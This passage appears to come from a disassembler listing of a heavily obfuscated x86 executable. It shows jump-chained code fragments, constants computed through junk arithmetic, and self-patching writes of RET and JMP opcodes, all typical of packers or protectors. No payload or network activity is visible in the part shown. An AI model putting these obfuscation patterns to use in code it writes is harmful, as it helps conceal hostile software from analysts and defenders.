		call	sub_444BB7

loc_448C59:				; CODE XREF: sub_453867-AF65j
		jmp	loc_450C4E
sub_448C53	endp

; ---------------------------------------------------------------------------
		mov	ebp, esp
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		jmp	loc_43D000
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454DDC

loc_448C6B:				; CODE XREF: sub_454DDC-12FF4j
		mov	[ecx], edi
; END OF FUNCTION CHUNK	FOR sub_454DDC
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_448C6D:				; CODE XREF: sub_4458DD:loc_454914j
		shr	edi, 17h
		push	0FF0E321Ch

loc_448C75:				; CODE XREF: y2kk37jd:loc_45AD47j
		push	7D6B5595h
		pop	eax
		jmp	loc_45C5F5
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_448C80	proc near		; CODE XREF: y2kk37jd:004506B6j
					; sub_458834+Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004426AA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045B16E SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		mov	ebx, edx
		jmp	loc_4426AA
sub_448C80	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_448C8C:				; CODE XREF: sub_44001E+31D6j
		xchg	ebx, [esp+10h+var_10]
		mov	ebp, eax
		xchg	ebp, [esp+10h+var_10]
		call	sub_43BA66
		mov	[ebp-4], eax
		jmp	loc_44A4FA
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		cmp	ecx, esi
		jmp	loc_43D4C8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F84

loc_448CA9:				; CODE XREF: sub_458F84+8j
		jmp	loc_44E421
; END OF FUNCTION CHUNK	FOR sub_458F84

; =============== S U B	R O U T	I N E =======================================



sub_448CAE	proc near		; CODE XREF: y2kk37jd:loc_43DD48j
					; sub_447E3E+13BBFp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CEDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D38B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DD7B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043E583 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0043FD4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440944 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440C51 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044152D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447DA4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447E21 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004480B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004489B1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044920D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A614 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E05F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045080E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004513D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045179B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004519AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004523D9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453C34 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004543B1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004551C8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455ACE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DAB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004588B0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A1CE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045C32E SIZE 0000000E BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi

loc_448CB2:				; CODE XREF: y2kk37jd:loc_4415F9j
		add	eax, ebp
		push	esi
		push	0C387908Eh
		pop	esi
		sub	esi, 68C7F4FFh
		jmp	loc_447DA4
sub_448CAE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41E07C, eax
		lea	eax, sub_451711
		mov	byte ptr [eax],	0C3h
		jmp	sub_451711
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_446D63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_448CE0:				; CODE XREF: sub_43BAF2:loc_45A872j
		mov	ebx, [edx]
		sub	ebx, eax
		mov	ecx, [ebp-4]
		jmp	loc_449466
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; ---------------------------------------------------------------------------

loc_448CEC:				; CODE XREF: y2kk37jd:loc_43EE9Bj
		sub	edx, eax
		mov	ecx, [ebp-4]
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448CF1:				; CODE XREF: sub_445226:loc_4503F2j
		jmp	loc_458F4B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_448CF6:				; CODE XREF: y2kk37jd:00444E42j
		jnb	loc_459322
		shr	edx, 0Eh
		mov	[ebx], esi
		or	ebx, eax
		or	edi, 816A5845h
		jmp	loc_459F6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_448D0E:				; CODE XREF: sub_43D41D+11384j
		push	0D7F23240h
		pop	edx
		rol	edx, 4
		jb	loc_455C4B
; END OF FUNCTION CHUNK	FOR sub_43D41D
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_448D1D:				; CODE XREF: sub_4554E9-132BFj
		jmp	loc_456DED
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
		ror	ebx, 0Fh
		shr	ebp, 8

loc_448D28:				; CODE XREF: y2kk37jd:loc_44DE46j
		jmp	loc_44E0EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_448D2D:				; CODE XREF: sub_43C865:loc_455854j
		xor	esi, eax
		or	eax, 6B1DC5C1h
		shr	edi, 1Eh

loc_448D38:				; CODE XREF: sub_44D6BF:loc_443610j
					; sub_44D6BF:loc_44DD74j ...
		jmp	loc_44BC5E
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
		jmp	loc_44680C

; =============== S U B	R O U T	I N E =======================================



sub_448D42	proc near		; CODE XREF: sub_44FB21:loc_44C5A2j

var_4		= dword	ptr -4

		push	ebx
		push	230DFDABh
		pop	ebx
		xor	ebx, 5F0175FBh
		add	ebx, 8437814Bh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_44FC52
sub_448D42	endp

; ---------------------------------------------------------------------------
		sbb	esi, 0B6C80411h
		jmp	sub_43BF5F
; ---------------------------------------------------------------------------

loc_448D68:				; CODE XREF: y2kk37jd:0044F8C9j
		sub	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448D6A:				; CODE XREF: sub_445226:loc_44F8B2j
		add	edx, 0D505CF3Eh
		add	edx, ebp
		add	edx, 94EC4976h
		jmp	loc_43E009
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_448D7D:				; CODE XREF: y2kk37jd:00451F6Aj
		mov	byte ptr [edx],	0E9h
		pop	edx
		mov	ebx, eax
		pop	eax
		xor	ebx, 3C1C51E5h
		rol	ebx, 1Eh
		add	ebx, 0EA231CDBh
		xchg	ebx, [esp]
		jmp	sub_44572F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C4E

loc_448D9C:				; CODE XREF: sub_446C4E+12j
		jmp	loc_44C801
; END OF FUNCTION CHUNK	FOR sub_446C4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_448DA1:				; CODE XREF: sub_458A74:loc_43B889j
		jz	loc_43CBAC
		jmp	loc_456405
; END OF FUNCTION CHUNK	FOR sub_458A74
; ---------------------------------------------------------------------------

loc_448DAC:				; DATA XREF: sub_448A12-1FF0o
		or	ecx, ecx
		jz	loc_455EE9
		push	offset sub_454454
		jmp	locret_44CE44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_448DBE:				; CODE XREF: sub_43E1E9:loc_44D51Aj
		cdq
		sbb	esi, 81ED3565h
		jmp	loc_444615
; END OF FUNCTION CHUNK	FOR sub_43E1E9

; =============== S U B	R O U T	I N E =======================================



sub_448DCA	proc near		; CODE XREF: sub_43E619+4p
					; y2kk37jd:loc_44AD44j	...

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043BAB5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C204 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E4D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ED5B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F271 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F783 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441EC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B3E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443F1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044691C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447865 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044926C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00449757 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044AAD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D175 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D89B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044DFB6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450819 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045225D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045408D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458B3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045923B SIZE 0000000D BYTES

		js	loc_447865
		call	sub_43B8D6

loc_448DD5:				; CODE XREF: sub_4507BF:loc_446BB0j
		cmp	ebx, ebp
		jmp	loc_43F783
sub_448DCA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E178, eax
		lea	eax, nullsub_15
		mov	byte ptr [eax],	0C3h
		jmp	loc_447B3E
; ---------------------------------------------------------------------------
		push	eax
		push	0A6F2275h
		pop	eax
		jmp	loc_4593DC
; ---------------------------------------------------------------------------

loc_448DFC:				; CODE XREF: y2kk37jd:loc_44B1B0j
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		xchg	ebp, [esp]
		push	ebp
		pop	eax
		jmp	loc_45051D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_448E0C:				; CODE XREF: sub_43FEFB:loc_446611j
		rol	edi, 5
		add	edi, 294BF41Ah
		jmp	loc_441903
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; ---------------------------------------------------------------------------

loc_448E1A:				; CODE XREF: y2kk37jd:00447815j
		adc	ebx, edx
		and	ecx, esi
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_448E1E:				; CODE XREF: sub_43C335+6015j
		add	edx, 3312F6E3h
		and	edx, ds:4000ECh
		xor	edx, 5333C1EFh
		call	sub_440CD1
		push	eax
		jmp	loc_4550C6
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448E3B:				; CODE XREF: sub_445226+8342j
		jp	loc_43E713

loc_448E41:				; CODE XREF: sub_45742F:loc_44D748j
		push	offset sub_44252E
		jmp	loc_454D56
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		push	edx
		push	0D1F3B2EAh
		pop	edx
		or	edx, 386DB204h
		jmp	loc_45BF6E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_262. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9FA

loc_448E5E:				; CODE XREF: sub_43B9FA+95D2j
		jmp	nullsub_56
; END OF FUNCTION CHUNK	FOR sub_43B9FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_448E63:				; CODE XREF: sub_4477A2:loc_455494j
		push	edx
		call	sub_44F3F5
		mov	eax, 92A798AFh
		push	edi
		push	75B6E6AAh
		pop	edi
		rol	edi, 1Bh
		or	edi, 0CFAC0BBCh
		jmp	loc_45A0AD
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_448E83:				; CODE XREF: sub_440337+6j
		mov	edx, ds:dword_441110
		or	edx, edx
		jnz	loc_443401
		jmp	loc_44E441
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC77

loc_448E96:				; CODE XREF: sub_44AC77:loc_4470D4j
		jnz	loc_444FFD
; END OF FUNCTION CHUNK	FOR sub_44AC77
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448E9C:				; CODE XREF: sub_445226:loc_45A4CBj
		jmp	loc_445680
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_448EA1:				; CODE XREF: sub_45A961:loc_447ED3j
					; sub_445787+116DAj
		push	59AF1596h
		pop	eax
		xor	eax, 1E917CE4h
		add	eax, 0E2ADB4B8h
		jns	loc_45A5A5
		test	edx, 0B54F00C9h
		jmp	loc_452FEC
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_448EC4:				; CODE XREF: y2kk37jd:loc_443C00j
		call	sub_442C3E
		call	sub_43D20F
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_448ECE:				; CODE XREF: sub_45B7AA-1C3ACj
		jl	loc_43B7C6
		jl	loc_453A99
		sbb	ebp, 9763D5DCh

loc_448EE0:				; CODE XREF: sub_45B7AA:loc_45346Bj
		lea	eax, [ebp-26Fh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_43B9B8
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B42

loc_448EF7:				; CODE XREF: sub_452B42:loc_454AC1j
		jz	loc_444B74
		xor	esi, ebp
		mov	ecx, [ebx]

loc_448F01:				; CODE XREF: y2kk37jd:loc_4570E0j
		push	6F49D87Ch
		jmp	loc_444B74
; END OF FUNCTION CHUNK	FOR sub_452B42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_448F0B:				; CODE XREF: sub_44DF1D+Bj
		pop	edi
		rol	edi, 1Bh
		sub	edi, 0B33A887Fh
		add	edi, 6542CAE0h
		rol	edi, 14h
		add	edi, 80271DD9h
		add	edi, ebp
		jmp	loc_43E09F
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_448F2B:				; CODE XREF: sub_44A298-1C00j
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_44457F
		push	edi
		push	7F30E4ECh
		pop	edi
		and	edi, 92C1E02Ch
		sub	edi, 0FB73007Ch
		xor	edi, 0E026EBF7h

loc_448F50:				; CODE XREF: y2kk37jd:loc_44A754j
		jmp	loc_457884
; END OF FUNCTION CHUNK	FOR sub_44A298

; =============== S U B	R O U T	I N E =======================================



sub_448F55	proc near		; DATA XREF: y2kk37jd:00454C90o
		push	esi
sub_448F55	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_448F56:				; CODE XREF: sub_4578A6:loc_44266Ej
		push	offset sub_43FE06
		jmp	loc_454A8D
; END OF FUNCTION CHUNK	FOR sub_4578A6

; =============== S U B	R O U T	I N E =======================================



sub_448F60	proc near		; CODE XREF: y2kk37jd:00446AD7j
					; sub_445226+11A4Fp

; FUNCTION CHUNK AT 0043BE68 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DD87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B3A7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456CBB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045BAE6 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0D3C7695h
		pop	edx
		xor	edx, 0A9EC5E3Ah
		jmp	loc_45BAE6
sub_448F60	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B583

loc_448F75:				; CODE XREF: sub_45B583+513j
		sub	ecx, 1C474B16h
		pop	esi
		not	ebp
		push	ecx
		jmp	loc_44A2D8
; END OF FUNCTION CHUNK	FOR sub_45B583
; ---------------------------------------------------------------------------

loc_448F84:				; DATA XREF: sub_4526A0-8E2o
		xchg	eax, [esp]
		jmp	sub_458FC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C224

loc_448F8C:				; CODE XREF: sub_44C224+7268j
		pop	eax
		or	eax, 0CCE13DE0h
		add	eax, 1148D29Fh
		xchg	eax, [esp-4+arg_0]
		jmp	loc_43DE6A
; END OF FUNCTION CHUNK	FOR sub_44C224
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_43CDA1
		jmp	loc_441AEE
; ---------------------------------------------------------------------------

loc_448FAE:				; CODE XREF: y2kk37jd:0045C0DCj
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_4513DB
		mov	eax, 5AB1337Ah
		call	sub_442C3E
		mov	ds:dword_41E188, eax
		lea	eax, nullsub_6
		jmp	loc_43D877
; ---------------------------------------------------------------------------
		shl	eax, 0Fh
		sub	edi, edx
		jmp	sub_451D24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_448FDD:				; CODE XREF: sub_45596A-3E81j
		xor	eax, 4B6FC4F7h

loc_448FE3:				; CODE XREF: sub_45596A:loc_43E5D0j
		call	sub_45405E
		mov	edx, 0F2B89A19h
		call	sub_440CD1
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		call	sub_43EA8B
; END OF FUNCTION CHUNK	FOR sub_45596A
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_448FFD:				; CODE XREF: sub_443AA7+1623Aj
		jmp	loc_44ECC3
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_449002:				; CODE XREF: sub_4458DD+5CD7j
		jmp	nullsub_134
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		jmp	ds:off_41E0D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_44900D:				; CODE XREF: y2kk37jd:0043F86Bj
					; sub_43F5BD:loc_4414F4j ...
		js	loc_44E96B
		pop	edx
		mov	eax, [esp+0]
		push	edx
		jmp	loc_441813
; END OF FUNCTION CHUNK	FOR sub_43F5BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_356. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_44901E:				; CODE XREF: sub_44D302+E7A9j
		jmp	loc_45149B
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_449023:				; CODE XREF: sub_43E389:loc_441AE9j
		xchg	ebx, [esp+4+var_4]
		jmp	loc_444F24
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------

locret_44902B:				; CODE XREF: y2kk37jd:0043B87Dj
		retn
; ---------------------------------------------------------------------------
		or	edx, ebp
		jmp	sub_44931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_449033:				; CODE XREF: sub_44B79D:loc_447E8Ej
		jz	sub_43BB55
		jmp	loc_4529B8
; END OF FUNCTION CHUNK	FOR sub_44B79D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44896B

loc_44903E:				; CODE XREF: sub_44896B+13j
		push	0FDFED885h
		xchg	ebx, [esp+8+var_8]
		mov	edx, ebx
		pop	ebx

loc_449049:				; CODE XREF: sub_45596A:loc_451AE3j
		jmp	loc_44C3C5
; END OF FUNCTION CHUNK	FOR sub_44896B
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 15h
		push	edi
		push	0DD6F39B0h
		jmp	loc_43D953
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_44905D:				; CODE XREF: sub_457533:loc_4406B8j
		jz	loc_43F628
		jmp	loc_441153
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_449068:				; CODE XREF: sub_453867+64F5j
		jz	loc_443539

loc_44906E:				; CODE XREF: sub_442F52+153A7j
		jmp	loc_45108A
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		xor	ebp, eax
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_449075:				; CODE XREF: sub_45B7AA:loc_45879Aj
		jmp	loc_44352D
; END OF FUNCTION CHUNK	FOR sub_45B7AA

; =============== S U B	R O U T	I N E =======================================



sub_44907A	proc near		; DATA XREF: y2kk37jd:00446983o
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_394
sub_44907A	endp

; ---------------------------------------------------------------------------
		pop	edx
		call	sub_444338
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_449088:				; CODE XREF: sub_457A46-19D45j
		add	edx, 0E6AB034Fh
		mov	edx, [edx]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_457A4E
		jmp	loc_45A715
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------

loc_4490A9:				; CODE XREF: y2kk37jd:0045ADB7j
		test	ebp, 1F7A131h
		jmp	loc_44ACE7

; =============== S U B	R O U T	I N E =======================================



sub_4490B4	proc near		; CODE XREF: y2kk37jd:004464C2j
					; sub_4448E2+6D27p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BE1C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043F988 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044596C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00446A71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A421 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C364 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044C3B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E618 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E7F2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450DC7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004529A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552E3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455D8D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C0A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045B515 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C6A4 SIZE 0000000E BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4552E3
		jmp	loc_446A71
sub_4490B4	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_425. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4490CB	proc near		; CODE XREF: sub_456809-C0D9p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044F381 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456C01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A657 SIZE 0000000D BYTES

		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45A657
sub_4490CB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_4490D6:				; CODE XREF: sub_45B41E:loc_4421E7j
		sub	ecx, 43A61182h
		xor	ecx, ds:4000EEh
		add	ecx, 7B4864A2h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45C5BB
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_4490F0:				; CODE XREF: sub_44CF09+3224j
		push	esi
		sub	eax, 7C5FDE79h
		jnz	loc_443AAB
		mov	ebx, 48CD74E5h
		jmp	loc_43EB48
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_449107:				; CODE XREF: sub_4504DD:loc_43DFDAj
		xor	eax, 0B92043A5h
		or	eax, 0E3DA8532h
		add	eax, 0F13DA754h
		call	sub_442C3E
		mov	ds:off_41E064, eax
		jmp	loc_4424AB
; END OF FUNCTION CHUNK	FOR sub_4504DD

; =============== S U B	R O U T	I N E =======================================



sub_449129	proc near		; CODE XREF: y2kk37jd:0044A667j
					; sub_4448E2+8761p

; FUNCTION CHUNK AT 0043B69A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A0A5 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 0044AF1E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044DB54 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456418 SIZE 00000023 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	eax
		call	sub_44DB32

loc_449133:				; CODE XREF: sub_43E049+5F17j
					; y2kk37jd:0044BFB9j ...
		jns	loc_456418
		lea	eax, [ebp-20h]
		jmp	loc_43B69A
sub_449129	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446AC6

loc_449141:				; CODE XREF: sub_446AC6+1542j
					; sub_446AC6:loc_44AF13j
		push	0D4486A20h
		push	offset loc_44077E
		jmp	loc_44F96A
; END OF FUNCTION CHUNK	FOR sub_446AC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB40

loc_449150:				; CODE XREF: sub_44DB40+5F82j
		jnz	loc_44EAEE
; END OF FUNCTION CHUNK	FOR sub_44DB40
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_449156:				; CODE XREF: sub_44001E+1C0A2j
		jmp	sub_45C4C8
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		xchg	edx, esi
		add	ebx, edx
		add	ebp, eax
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_449161:				; CODE XREF: sub_4480CB:loc_44ACE7j
		jmp	loc_44EAEE
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
		push	offset sub_44365E
		jmp	loc_45902B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E658

loc_449170:				; CODE XREF: sub_43E658+1Cj
		or	eax, 0FE7CA838h
		jnz	loc_43F387
		shr	eax, 9
		jmp	loc_44B7EB
; END OF FUNCTION CHUNK	FOR sub_43E658
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_449184:				; CODE XREF: sub_45689F-13A42j
					; sub_44314E:loc_45C628j
		push	offset sub_450F34
		jmp	loc_44F04A
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_44918E	proc near		; DATA XREF: sub_44131E+171Do

; FUNCTION CHUNK AT 0045BBAE SIZE 00000018 BYTES

		push	0E9B287E1h

loc_449193:				; CODE XREF: y2kk37jd:0043B221j
		sbb	edi, ebp
		jmp	loc_45BBAE
sub_44918E	endp

; ---------------------------------------------------------------------------

loc_44919A:				; DATA XREF: sub_447BC3o
		push	edx
		push	0A645E2D0h
		pop	edx
		sub	edx, 4A7F7F64h
		call	sub_43FD1C
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4491AC:				; CODE XREF: sub_44001E:loc_445DB2j
		push	0A1C0DC78h
		pop	eax
		xor	eax, 0ACC3502Fh
		cmp	eax, 4EC0AA2Fh
		jmp	loc_459657
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_4491C3:				; CODE XREF: sub_43B8D6+1A6D0j
		sbb	ebp, 289312C8h
		sub	ebp, edx
		not	ebp
		jmp	loc_457628
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
